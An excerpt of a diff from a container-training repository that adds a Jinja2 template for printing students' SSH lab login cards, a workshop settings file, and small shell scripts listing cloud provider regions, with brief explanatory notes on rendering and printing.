SETTINGS=admin-test
TAG=$PREFIX-$SETTINGS
./labctl create \
  --tag $TAG \
  --provider $PROVIDER \
  --settings settings/$SETTINGS.env \
  --students $STUDENTS
1  prepare-labs/tags  Symbolic link
@@ -0,0 +1 @@
terraform/tags
prepare-labs/templates/cards.html (new file, 237 lines)
@@ -0,0 +1,237 @@
{#
  The variables below can be customized here directly, or in your
  settings.yaml file. Any variable in settings.yaml will be exposed
  in here as well.
#}

{%- set url = url
    | default("http://FIXME.container.training/") -%}
{%- set pagesize = pagesize
    | default(10) -%}
{%- set lang = lang
    | default("en") -%}
{%- set event = event
    | default("training session") -%}
{%- set backside = backside
    | default(False) -%}
{%- set image = image
    | default(False) -%}
{%- set clusternumber = clusternumber
    | default(None) -%}
{%- set thing = thing
    | default("lab environment") -%}

{%- if lang == "en" -%}
{%- set intro -%}
Here is the connection information to your very own
{{ thing }} for this {{ event }}.
You can connect to it with any SSH client.
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set intro -%}
Voici les informations permettant de se connecter à votre
{{ thing }} pour cette formation.
Vous pouvez vous y connecter
avec n'importe quel client SSH.
{%- endset -%}
{%- endif -%}
{%- if lang == "en" -%}
{%- set slides_are_at -%}
You can find the slides at:
{%- endset -%}
{%- endif -%}
{%- if lang == "fr" -%}
{%- set slides_are_at -%}
Le support de formation est à l'adresse suivante :
{%- endset -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<style>
@import url('https://fonts.googleapis.com/css?family=Slabo+27px');

{% if paper_size == "A4" %}
@page {
  size: A4;      /* Explicitly set the page size to A4 */
  margin: 0.5cm; /* Set margin on each page */
}
body {
  /* this is A4 minus 0.5cm margins */
  width: 20cm;
  height: 28.7cm;
}
{% elif paper_size == "Letter" %}
@page {
  size: Letter; /* 8.5in x 11in */
}
body {
  width: 6.75in;        /* two cards wide */
  margin-left: 0.875in; /* (8.5in - 6.75in)/2 */
  margin-top: 0.1875in; /* (11in - 5 cards)/2 */
}
{% endif %}

body, table {
  line-height: 1em;
  font-size: 15px;
  font-family: 'Slabo 27px';
}

table {
  border-spacing: 0;
  margin-top: 0.4em;
  margin-bottom: 0.4em;
  border-left: 0.8em double grey;
  padding-left: 0.4em;
}

td:first-child {
  width: 10.5em;
}

div.card {
  float: left;
  border: 0.01in dotted black;
  /*
  columns * (width+left+right) < 100%
  height: 33%;
  width: 24.8%;
  width: 33%;
  */
  width: 3.355in;  /* 3.375in minus two 0.01in borders */
  height: 2.105in; /* 2.125in minus two 0.01in borders */
}

p {
  margin: 0.8em;
}

div.front {
  {% if image %}
  background-image: url("{{ image }}");
  background-repeat: no-repeat;
  background-size: 1in;
  background-position-x: 2.8in;
  background-position-y: center;
  {% endif %}
}

span.scale {
  white-space: nowrap;
}

.qrcode img {
  height: 5.8em;
  padding: 1em 1em 0.5em 1em;
  float: left;
}

.logpass {
  font-family: monospace;
  font-weight: bold;
}

.pagebreak {
  page-break-after: always;
  clear: both;
  display: block;
  height: 0;
}
</style>
<script type="text/javascript" src="qrcode.min.js"></script>
<script type="text/javascript">
function qrcodes() {
  [].forEach.call(
    document.getElementsByClassName("qrcode"),
    (e, index) => {
      new QRCode(e, {
        text: "{{ qrcode }}",
        correctLevel: QRCode.CorrectLevel.L
      });
    }
  );
}

function scale() {
  [].forEach.call(
    document.getElementsByClassName("scale"),
    (e, index) => {
      var text_width = e.getBoundingClientRect().width;
      var box_width = e.parentElement.getBoundingClientRect().width;
      var percent = 100 * box_width / text_width + "%";
      e.style.fontSize = percent;
    }
  );
}
</script>
</head>
<body onload="qrcodes(); scale();">
{% for login in logins %}
<div class="card front">
  <p>{{ intro }}</p>
  <p>
    <table>
      <tr>
        <td>login:</td>
        <td>password:</td>
      </tr>
      <tr>
        <td class="logpass">{{ login.login }}</td>
        <td class="logpass">{{ login.password }}</td>
      </tr>
      <tr>
        <td>IP address:</td>
        {% if login.port %}
        <td>port:</td>
        {% endif %}
      </tr>
      <tr>
        <td class="logpass">{{ login.ipaddrs.split("\t")[0] }}</td>
        {% if login.port %}
        <td class="logpass">{{ login.port }}</td>
        {% endif %}
      </tr>
    </table>
  </p>
  <p>
    {% if url %}
    {{ slides_are_at }}
    <p>
      <span class="scale">{{ url }}</span>
    </p>
    {% endif %}
  </p>
</div>
{% if loop.index%pagesize==0 or loop.last %}
<span class="pagebreak"></span>
{% if backside %}
{% for x in range(pagesize) %}
<div class="card back">
  {{ backside }}
  {#
  <p>Thanks for attending
  "Getting Started With Kubernetes and Container Orchestration"
  during CONFERENCE in Month YYYY!</p>
  <p>If you liked that workshop,
  I can train your team, in person or
  online, with custom courses of
  any length and any level.
  </p>
  {% if qrcode %}
  <p>If you're interested, please scan that QR code to contact me:</p>
  <span class="qrcode"></span>
  {% else %}
  <p>If you're interested, you can contact me at:</p>
  {% endif %}
  <p>jerome.petazzoni@gmail.com</p>
  #}
</div>
{% endfor %}
<span class="pagebreak"></span>
{% endif %}
{% endif %}
{% endfor %}
</body>
</html>
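The @page and .pagebreak rules above only take effect when the page is printed. A minimal way to turn a rendered copy of this template into printable PDF cards is headless Chromium; a sketch, where cards-rendered.html is a hypothetical filename for the rendered output, not a file from this diff:

# Sketch: print the rendered cards to PDF with headless Chromium.
# "cards-rendered.html" is a hypothetical rendered copy of cards.html.
chromium --headless --disable-gpu --print-to-pdf=cards.pdf cards-rendered.html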
prepare-labs/templates/cards.yaml (new file, 19 lines)
@@ -0,0 +1,19 @@
cards_template: cards.html
paper_size: Letter
url: https://2024-11-qconsf.container.training
event: workshop
backside: |
  <div class="qrcode"></div>
  <p>
  Thanks for attending the Asynchronous Architecture Patterns workshop at QCON!
  </p>
  <p>
  <b>This QR code will give you my contact info</b> as well as a link to a feedback form.
  </p>
  <p>
  If you liked this workshop, I can train your team, in person or online, with custom
  courses of any length and any level, on Docker, Kubernetes, and MLops.
  </p>
qrcode: https://2024-11-qconsf.container.training/#contact
thing: Kubernetes cluster
image: logo-kubernetes.png
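cards.yaml supplies values for the variables that cards.html reads (url, event, backside, qrcode, thing, image, paper_size). As a sketch of how the two fit together, a generic tool such as jinja2-cli can render the template from the YAML file; note that the template also iterates over a logins list (login, password, ipaddrs, port), which this YAML file does not provide and which would come from the lab provisioning step:

# Sketch, assuming jinja2-cli is installed ("pip install jinja2-cli").
# This is not necessarily the repository's own rendering pipeline.
jinja2 templates/cards.html templates/cards.yaml > cards-rendered.html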
prepare-labs/terraform/list-locations/azure (new executable file, 4 lines)
@@ -0,0 +1,4 @@
#!/bin/sh
az account list-locations -o table \
    --query "sort_by([?metadata.regionType == 'Physical'], &regionalDisplayName)[]
    .{ displayName: displayName, regionalDisplayName: regionalDisplayName }"
prepare-labs/terraform/list-locations/civo (new executable file, 2 lines)
@@ -0,0 +1,2 @@
#!/bin/sh
civo region ls

prepare-labs/terraform/list-locations/digitalocean (new executable file, 2 lines)
@@ -0,0 +1,2 @@
#!/bin/sh
doctl compute region list

prepare-labs/terraform/list-locations/exoscale (new executable file, 2 lines)
@@ -0,0 +1,2 @@
#!/bin/sh
exo zone
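All four list-locations helpers follow the same convention: one executable per provider, printing that provider's available regions. They can therefore be driven uniformly; a sketch, assuming the az, civo, doctl, and exo CLIs are installed and authenticated:

# Sketch: print available locations for every provider shown above.
for provider in azure civo digitalocean exoscale; do
  echo "=== $provider ==="
  ./prepare-labs/terraform/list-locations/$provider
done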